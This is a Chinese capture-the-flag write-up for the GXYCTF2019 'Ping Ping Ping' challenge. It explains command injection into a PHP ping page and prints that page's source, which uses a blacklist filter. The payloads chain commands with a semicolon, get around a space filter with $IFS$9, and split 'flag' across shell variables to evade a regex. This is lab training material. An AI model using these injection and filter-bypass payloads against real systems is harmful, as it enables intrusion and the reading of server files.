[GXYCTF2019]Ping Ping Ping
进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令
发现flag.PHP可惜不能直接cat flag.PHP估计绊掉了,那我们cat index.PHP看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了
?ip=127.0.0.1;cat$IFS$9index.PHP
源码如下
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
过滤了很多东西但是发现了一种方法可以绕过
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.PHP
我们通过;来拼接执行执行代码,通过$IFS$9绕过空格限制,然后拼接指令即可,但这里过滤了flag,要绕过正则匹配必须fl写在后面的哪个变量中
查看源码即可发现flag
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
